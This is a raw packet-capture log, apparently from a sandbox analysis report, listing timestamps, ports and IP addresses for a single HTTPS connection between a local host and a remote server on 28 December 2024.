Dec 28, 2024 22:21:21.485413074 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.485465050 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.485472918 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.485515118 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.647300005 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.647330999 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.647383928 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.647398949 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.647447109 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.647458076 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.653218031 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.653238058 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.653274059 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.653280020 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.653307915 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.653321981 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.658575058 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.658593893 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.658652067 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.658658981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.658699989 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.665484905 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.665503979 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.665570974 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.665577888 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.665621042 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.671216011 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.671232939 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.671310902 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.671319962 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.671360970 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.678177118 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.678194046 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.678267002 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.678273916 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.678317070 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.686873913 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.686891079 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.686964035 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.686970949 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.687011957 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944396973 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944422960 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944477081 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944535971 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944561958 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944583893 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944591045 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944622993 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944626093 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944649935 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944660902 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944665909 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944684982 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944689989 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944698095 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944715023 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944739103 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944751024 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944772959 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944808006 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944812059 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944833040 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944833040 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944854975 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944883108 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944886923 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944919109 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944921017 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944936991 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944981098 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.944983006 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.944993019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.945014954 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.945019960 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.945046902 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.945049047 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.945060968 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.945090055 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.945092916 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.945128918 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.945133924 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:21.945171118 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.945195913 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:21.951117992 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.050283909 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.050304890 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.050393105 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.050414085 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.050455093 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.055464029 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.055484056 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.055552959 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.055569887 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.055613995 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.061330080 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.061350107 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.061419964 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.061435938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.061472893 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.067260981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.067279100 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.067327976 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.067353010 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.067363977 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.067639112 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.072362900 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.072380066 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.072441101 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.072452068 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.072489977 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.072510004 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.078327894 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.078345060 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.078425884 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.078433037 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.078475952 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.083844900 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.083863974 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.083918095 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.083926916 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.084017038 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.089653969 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.089694023 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.089745998 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.089770079 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.089786053 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.091646910 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.251646996 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.251668930 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.251734018 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.251749039 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.251805067 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.256860018 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.256876945 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.256926060 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.256932020 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.256988049 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.262784958 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.262801886 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.262870073 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.262876034 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.262909889 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.268518925 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.268542051 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.268603086 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.268608093 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.268654108 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.273746014 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.273761988 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.273813963 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.273818970 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.273858070 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.279670000 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.279690981 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.279731035 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.279736042 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.279764891 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.279778957 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.285142899 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.285165071 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.285200119 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.285204887 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.285248995 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.291171074 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.291188002 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.291243076 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.291249037 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.291291952 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.291299105 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.308684111 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.453037024 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.453063965 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.453121901 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.453135014 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.453180075 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.458193064 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.458215952 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.458254099 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.458259106 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.458304882 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.464134932 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.464168072 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.464210987 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.464215994 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.464232922 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.464262009 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.469924927 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.469940901 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.469995975 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.470001936 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.470041037 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.475860119 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.475878000 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.475927114 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.475931883 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.475982904 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.481215954 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.481235027 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.481302977 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.481309891 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.481349945 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.486716032 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.486737013 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.486773014 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.486778975 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.486824036 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.492557049 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.492575884 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.492619991 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.492635012 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.492662907 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.492677927 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.654586077 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.654618979 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.654680967 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.654697895 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.654731989 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.654745102 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.659945011 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.659962893 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.660053015 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.660062075 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.660233974 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.664697886 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.664762974 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.664772987 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.664787054 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.664822102 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.670613050 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.670639038 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.670676947 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.670682907 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.670705080 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.670720100 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.675812960 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.675838947 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.675894976 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.675899982 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.675928116 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.675949097 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.681627989 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.681664944 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.681689978 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.681694031 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.681729078 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.681740046 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.687222004 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.687247992 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.687325954 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.687330961 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.687378883 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.693120003 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.693147898 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.693201065 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.693207026 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.693252087 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.734946966 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.856878042 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.856919050 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.856954098 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.856969118 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.856997967 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.857017040 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.862255096 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.862278938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.862330914 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.862340927 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.862399101 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.867980003 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.868001938 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.868045092 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.868058920 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.868086100 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.868100882 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.873822927 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.873840094 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.873887062 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.873900890 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.873934984 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.873950005 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.879703999 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.879719019 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.879817009 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.879817009 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.879843950 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.879880905 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.885200977 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.885216951 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.885328054 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.885338068 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.885422945 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.890470028 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.890486002 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.890590906 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.890598059 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.890698910 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.896378994 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.896395922 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.896472931 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.896481037 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:22.896528006 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:22.907141924 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.057862043 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.057884932 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.058012009 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.058051109 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.058134079 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.063922882 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.063941002 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.064028978 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.064038038 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.064091921 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.069526911 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.069545031 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.069649935 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.069659948 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.069710016 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.074919939 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.074937105 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.075012922 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.075021029 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.075125933 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.080641031 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.080658913 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.080760002 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.080766916 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.080832005 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.086209059 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.086227894 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.086302996 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.086332083 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.086409092 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.092118025 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.092154980 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.092206001 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.092215061 CET	443	49849	65.9.108.93	192.168.2.5
Dec 28, 2024 22:21:23.092245102 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.092355013 CET	49849	443	192.168.2.5	65.9.108.93
Dec 28, 2024 22:21:23.097922087 CET	443	49849	65.9.108.93	192.168.2.5
